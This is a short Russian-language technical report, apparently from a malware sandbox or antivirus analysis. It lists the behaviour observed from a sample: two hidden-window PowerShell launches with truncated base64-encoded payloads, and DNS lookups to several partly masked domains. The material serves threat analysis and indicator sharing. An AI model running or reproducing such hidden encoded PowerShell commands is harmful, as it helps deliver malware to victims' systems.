Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -e JABOADIAMwAyADkAMQA4ADMAMgA4ADEAPQAnAEIANwA0ADIAMAA0ADMAMQAzADgAOQAnADsAJABNADgAMAAxADAANAAzADYANwAgAD0AIAAnADYAOAA0ACcAOwAkAEEAMwA2ADQAMwAxADkAOQAyAD0AJwBSADgAMwAxADYAOAAxADQAMAA2...
- DNS ASK es####ensmurah.com
- DNS ASK dt##l.com
- DNS ASK ev####day-sale.com
- DNS ASK ex#####s.xhtmlchop.com
- DNS ASK fa####nupnext.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -e JABOADIAMwAyADkAMQA4ADMAMgA4ADEAPQAnAEIANwA0ADIAMAA0ADMAMQAzADgAOQAnADsAJABNADgAMAAxADAANAAzADYANwAgAD0AIAAnADYAOAA0ACcAOwAkAEEAMwA2ADQAMwAxADkAOQAyAD0AJwBSADgAMwAxADYAOAAxADQAMAA2...' (со скрытым окном)